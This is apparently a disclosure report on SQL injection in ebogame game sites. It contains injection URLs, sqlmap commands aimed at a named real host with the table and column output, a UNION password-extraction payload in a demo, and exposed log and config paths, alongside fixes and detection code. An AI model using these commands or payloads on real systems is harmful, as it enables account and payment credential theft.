Multiple ebogame web game platforms have a SQL injection vulnerability (the injected queries run as MySQL root), leaking the details of a million gamers (username, password, payment password, etc.)
Multiple ebogame web game platforms have a SQL injection vulnerability (the injected queries run as MySQL root). It exposes the details of a million gamers (username, password, payment password, etc.), and the same hosts also leak order information and the MySQL password through files readable from the web.
Injection points (hostnames masked by the platform):

1. http://**.**.**/gameing.php?url=http%3A%2F%2Fs1.ebogame.yjxy.mlong.cn
2. http://**.**.**/codereceive.php?cid=2545
3. http://**.**.**/news.php?contentid=2296
4. http://**.**.**/news.php?contentid=1407

The url, cid and contentid parameters of these pages are all SQL injection points.
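How the codereceive.php?cid= injection point works, and what the fix looks like, as an added example (not the platform's code). The real site is PHP on MySQL; this models the endpoint against an in-memory SQLite database. The ebogame_member columns are taken from the sqlmap column dump later in this report; the columns of ebogame_game_code, the row contents and the hashes are constructed.

```python
import sqlite3

# Added example, not the platform's code. ebogame_member's columns come from
# the report's sqlmap dump; ebogame_game_code's columns and all row contents
# are constructed (the hashes are MD5("password") and MD5("123456")).

def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE ebogame_game_code (cid INTEGER, code TEXT, gameid INTEGER);
        CREATE TABLE ebogame_member (
            id INTEGER, name TEXT,
            password TEXT, password_nomd5 TEXT,
            pay_pass TEXT, pay_pass_nomd5 TEXT);
        INSERT INTO ebogame_game_code VALUES (2545, 'GIFT-2545-AAAA', 7);
        INSERT INTO ebogame_member VALUES
            (1, 'player1', '5f4dcc3b5aa765d61d8327deb882cf99', 'password',
                'e10adc3949ba59abbe56e057f20f883e', '123456');
    """)
    return con

def codereceive_vulnerable(con, cid):
    # The pattern behind the finding: the request parameter is pasted into the
    # SQL text (in PHP: "... WHERE cid=" . $_GET['cid']). Everything after the
    # number is parsed as SQL, and with a root DB account it can read any database.
    sql = "SELECT code, gameid FROM ebogame_game_code WHERE cid = " + cid
    return con.execute(sql).fetchall()

def codereceive_fixed(con, cid):
    # Hardened form: reject non-numeric input, then bind the value as a
    # parameter so it can never be interpreted as SQL.
    if not cid.isdigit():
        raise ValueError("cid must be a positive integer")
    sql = "SELECT code, gameid FROM ebogame_game_code WHERE cid = ?"
    return con.execute(sql, (int(cid),)).fetchall()

# UNION payload of the kind sqlmap builds: two columns to match the original
# SELECT, pulling the plaintext password columns the dump revealed.
PAYLOAD = ("2545 UNION SELECT name || ':' || password_nomd5, pay_pass_nomd5 "
           "FROM ebogame_member")

def demo():
    """Run the payload against both versions; returns (stolen rows, payload blocked?)."""
    con = build_db()
    stolen = codereceive_vulnerable(con, PAYLOAD)
    try:
        codereceive_fixed(con, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return stolen, blocked

if __name__ == "__main__":
    rows, blocked = demo()
    for row in rows:
        print(row)
    print("payload rejected by fixed version:", blocked)
```

The vulnerable version returns the gift code row plus one row per member containing the plaintext login and payment passwords; the fixed version refuses the payload before any query runs. Parameter binding, not the digit check alone, is what closes the hole: the check is there so that a bad value fails loudly instead of reaching the database.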
Leaked configuration file (hostname masked by the platform):

1. http://**.**.**/caches/configs/database.php

The MySQL password leaks through this file, but the database does not accept external connections, so the credentials cannot be used directly from outside.
http://sglj.ebogame.com/log.txt
http://ebo.ebogame.com/log.txt
http://www.ebogame.com/log.txt

These log files leak order information, including today's orders.
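A check for the two kinds of file exposure above, as an added example (not part of the original report). The hostnames and the two paths are the report's; the response bodies, the content signatures and the fetch function are constructed so it runs offline. The point of the signatures is that a 200 on its own proves nothing: a PHP config that the server executes returns an empty body, and many sites answer every path with a 200 error page.

```python
import re
from urllib.parse import urljoin

# Added example. Hosts and paths are from the report; everything else is constructed.
HOSTS = ["http://sglj.ebogame.com", "http://ebo.ebogame.com", "http://www.ebogame.com"]
PATHS = ["/log.txt", "/caches/configs/database.php"]

SIGNATURES = {
    # Assumed PHPCMS-style array config: 'hostname' => ..., 'password' => ...
    "/caches/configs/database.php": re.compile(
        r"['\"](?:hostname|username|password)['\"]\s*=>", re.I),
    # Assumed order-log format: the word "order" followed by a number somewhere.
    "/log.txt": re.compile(r"\border\b.{0,40}\d", re.I),
}

def check_exposure(hosts, paths, fetch):
    """fetch(url) -> (status, body). Returns [(url, verdict)] for every probe."""
    findings = []
    for host in hosts:
        for path in paths:
            url = urljoin(host, path)
            status, body = fetch(url)
            if status != 200:
                verdict = "not exposed"
            elif not body.strip():
                # PHP ran the file and it printed nothing: no source disclosure.
                verdict = "served but empty (PHP executed, no source disclosure)"
            elif SIGNATURES[path].search(body):
                verdict = "LEAK"
            else:
                verdict = "200 without leak signature (soft 404?)"
            findings.append((url, verdict))
    return findings

def leaks(findings):
    """URLs whose body matched a leak signature."""
    return [url for url, verdict in findings if verdict == "LEAK"]

# Constructed responses standing in for the live hosts.
FAKE_RESPONSES = {
    "http://sglj.ebogame.com/log.txt":
        (200, "2016-01-18 10:01 order 201601180001 user player1 amount 100\n"),
    "http://sglj.ebogame.com/caches/configs/database.php": (200, ""),
    "http://ebo.ebogame.com/log.txt": (200, "<html>Page not found</html>"),
    "http://ebo.ebogame.com/caches/configs/database.php":
        (200, "<?php\nreturn array('default'=>array('hostname'=>'127.0.0.1',"
              "'username'=>'root','password'=>'REDACTED'));"),
    "http://www.ebogame.com/log.txt": (403, "Forbidden"),
    "http://www.ebogame.com/caches/configs/database.php": (404, ""),
}

def fake_fetch(url):
    return FAKE_RESPONSES.get(url, (404, ""))

if __name__ == "__main__":
    for url, verdict in check_exposure(HOSTS, PATHS, fake_fetch):
        print(verdict.ljust(55), url)
```

To run it against real hosts, replace fake_fetch with a function that performs the HTTP GET and returns the status and body; the verdict logic does not change. The "served but empty" case is worth keeping in mind: the config file is only a leak when the server hands out its source (a misconfigured handler, a .bak copy, or PHP not running), which is what the report observed.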
sqlmap.py -u "http://www.ebogame.com/codereceive.php?cid=2545" -D ebogame --tables > C:\test.txt

available databases [13]:
[*] 5ebo
[*] 5ebo_bbs
[*] 5ebo_oa
[*] 5ebo_ucenter
[*] 5ebo_www
[*] 5ebo_www_test
[*] eboedu
[*] ebogame
[*] ebogame_1
[*] information_schema
[*] my
[*] mysql
[*] test
Database: ebogame
[338 tables]
+-----------------------------------+
| api_send_mail |
| bbs_actlogs |
| bbs_apclog |
| bbs_beg |
| bbs_bmbcode |
| bbs_contacts |
| bbs_emoticons |
| bbs_favorites |
| bbs_forumdata |
| bbs_gueststat |
| bbs_invite |
| bbs_lastest |
| bbs_levels |
| bbs_onlinestat |
| bbs_polls |
| bbs_posts |
| bbs_potlog |
| bbs_primsg |
| bbs_schedule |
| bbs_search |
| bbs_appsforum |
| bbs_tags |
| bbs_threads |
| bbs_ugoptlist |
| bbs_usergroup |
| bbs_userlist |
| ebogame_activation |
| ebogame_advertising |
| ebogame_advertising_click |
| ebogame_bbs |
| ebogame_bbs_section |
| ebogame_category |
| ebogame_charge |
| ebogame_charge_20160118 |
| ebogame_charge_bf |
| ebogame_charge_copy |
| ebogame_charge_heepay |
| ebogame_content |
| ebogame_extension |
| ebogame_extension_member |
| ebogame_extension_percent |
| ebogame_extension_settlemen |
| ebogame_extension_settlemen_once |
| ebogame_game_areas |
| ebogame_game_code |
| ebogame_game_gift_code |
| ebogame_game_gift_code_ |
| ebogame_game_gift_code_17173 |
| ebogame_game_gift_info_ |
| ebogame_game_gift_info_17173 |
| ebogame_games |
| ebogame_integral |
| ebogame_member |
| ebogame_member_char |
| ebogame_member_info |
| ebogame_member_integral |
| ebogame_member_login |
| ebogame_member_price |
| ebogame_member_serv |
| ebogame_news |
| ebogame_pictures |
| ebogame_price |
| ebogame_question_reply |
| ebogame_questions |
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_connect_guest |
| pre_common_credit_log |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_devicetoken |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_crime |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_medal |
| pre_common_member_profile |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_stat_field |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_patch |
| pre_common_plugin |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_report |
| pre_common_searchindex |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_word |
| pre_common_word_type |
| pre_connect_disktask |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_postfeedlog |
| pre_connect_tthreadlog |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_exif |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_collection |
| pre_forum_collectioncomment |
| pre_forum_collectionfollow |
| pre_forum_collectioninvite |
| pre_forum_collectionrelated |
| pre_forum_collectionteamworker |
| pre_forum_collectionthread |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupuser |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_location |
| pre_forum_post_moderate |
| pre_forum_post_tableid |
| pre_forum_postcache |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_thread_moderate |
| pre_forum_threadaddviews |
| pre_forum_threadclass |
| pre_forum_threadclosed |
| pre_forum_threaddisablepos |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadpreview |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_tyexception |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_warning |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blog_moderate |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_comment_moderate |
| pre_home_docomment |
| pre_home_doing |
| pre_home_doing_moderate |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_follow |
| pre_home_follow_feed |
| pre_home_follow_feed_archiver |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_pic_moderate |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_assist_moderate |
| pre_home_show |
| pre_home_specialuser |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_visitor |
| pre_mobile_setting |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_moderate |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_comment_moderate |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_security_evilpost |
| pre_security_eviluser |
| pre_security_failedlog |
| pre_ucenter_admins |
| pre_ucenter_applications |
| pre_ucenter_badwords |
| pre_ucenter_domains |
| pre_ucenter_failedlogins |
| pre_ucenter_feeds |
| pre_ucenter_friends |
| pre_ucenter_mailqueue |
| pre_ucenter_memberfields |
| pre_ucenter_members |
| pre_ucenter_mergemembers |
| pre_ucenter_newpm |
| pre_ucenter_notelist |
| pre_ucenter_pm_indexes |
| pre_ucenter_pm_lists |
| pre_ucenter_pm_members |
| pre_ucenter_pm_messages_0 |
| pre_ucenter_pm_messages_1 |
| pre_ucenter_pm_messages_2 |
| pre_ucenter_pm_messages_3 |
| pre_ucenter_pm_messages_4 |
| pre_ucenter_pm_messages_5 |
| pre_ucenter_pm_messages_6 |
| pre_ucenter_pm_messages_7 |
| pre_ucenter_pm_messages_8 |
| pre_ucenter_pm_messages_9 |
| pre_ucenter_protectedmembers |
| pre_ucenter_settings |
| pre_ucenter_sqlcache |
| pre_ucenter_tags |
| pre_ucenter_vars |
| sglj_charge |
| sglj_coin |
| sglj_extension |
+-----------------------------------+
ebogame_member

sqlmap.py -u "http://www.ebogame.com/codereceive.php?cid=2545" -D ebogame -T ebogame_member --columns

Database: ebogame
Table: ebogame_member
[24 columns]
+----------------+-----------+
| Column         | Type      |
+----------------+-----------+
| 56xiu_id       | char(50)  |
| codestate      | int(1)    |
| display        | int(1)    |
| error_count    | int(1)    |
| error_time     | int(11)   |
| id             | int(11)   |
| integral       | int(11)   |
| integral_get   | int(11)   |
| integral_use   | int(11)   |
| name           | char(20)  |
| newip          | char(20)  |
| newtime        | int(11)   |
| oldip          | char(20)  |
| oldtime        | int(11)   |
| password       | char(40)  |
| password_nomd5 | char(20)  |
| password_old   | char(20)  |
| pay_pass       | char(40)  |
| pay_pass_nomd5 | char(20)  |
| regtime        | int(11)   |
| role           | char(2)   |
| times          | int(11)   |
| urlsource      | char(100) |
| yiqidd_id      | int(11)   |
+----------------+-----------+
With these columns dumped, the accounts can be logged into directly: password_nomd5 and pay_pass_nomd5 hold the login and payment passwords in plaintext alongside the hashed password and pay_pass columns, so no cracking is needed.

Solution:
Filter the input: cast cid and contentid to integers and whitelist url before they reach a query, and use prepared statements instead of string concatenation. Also give the web application its own low-privilege MySQL account instead of root, keep caches/configs/database.php and log.txt out of the web root, and drop the plaintext password_nomd5 and pay_pass_nomd5 columns.
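Detection of the kind of probing shown in the sqlmap output above, as an added example (not part of the original report). It parses combined-format access-log lines, URL-decodes the query string and flags requests whose parameters carry SQL fragments or that come from the sqlmap user agent. The log lines are constructed: the paths mirror the report's injection points, but the IPs, timestamps and payloads are invented.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Added example. Constructed access-log sample; only the endpoints and the
# table/column names echo the report.
SAMPLE_LOG = """\
203.0.113.9 - - [18/Jan/2016:10:01:02 +0800] "GET /codereceive.php?cid=2545 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Jan/2016:10:02:10 +0800] "GET /codereceive.php?cid=2545%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.7 - - [18/Jan/2016:10:02:11 +0800] "GET /codereceive.php?cid=2545%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.7 - - [18/Jan/2016:10:02:12 +0800] "GET /codereceive.php?cid=2545%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%28name%2Cpassword_nomd5%29%20FROM%20ebogame_member-- HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Jan/2016:10:03:00 +0800] "GET /news.php?contentid=2296 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Fragments that have no business in a numeric id parameter: UNION-based,
# boolean-based and time-based probes, schema enumeration and comment terminators.
SQLI_RE = re.compile(
    r"(\bUNION\b.*\bSELECT\b|\bSLEEP\s*\(|\bBENCHMARK\s*\(|"
    r"\bAND\s+\d+\s*=\s*\d+|\bOR\s+\d+\s*=\s*\d+|information_schema|"
    r"\bCONCAT\s*\(|--\s*$|#$|/\*)",
    re.I,
)

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Reasons a request looks like SQL injection probing; empty list if clean."""
    reasons = []
    query = entry["path"].partition("?")[2]
    decoded = unquote_plus(query)          # %20UNION%20 -> " UNION "
    if "sqlmap" in entry["ua"].lower():
        reasons.append("sqlmap user-agent")
    if SQLI_RE.search(decoded):
        reasons.append("sql keyword in query string")
    return reasons

def scan(log_text):
    """Return ([(ip, path, reasons)], Counter of flagged requests per source IP)."""
    hits = []
    per_ip = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["path"], reasons))
            per_ip[entry["ip"]] += 1
    return hits, per_ip

if __name__ == "__main__":
    hits, per_ip = scan(SAMPLE_LOG)
    for ip, path, reasons in hits:
        print(ip, path[:60], reasons)
    print("flagged requests per ip:", dict(per_ip))
```

The fourth sample line is the one to note: sqlmap's user agent is trivially changed (the --random-agent option), so the fingerprint that survives is the decoded query string, not the client header. The per-IP counter is what turns single matches into an incident: a handful of boolean and timing probes from one address within seconds against cid= is the signature of an automated scan, and the UNION request that follows it is the data leaving.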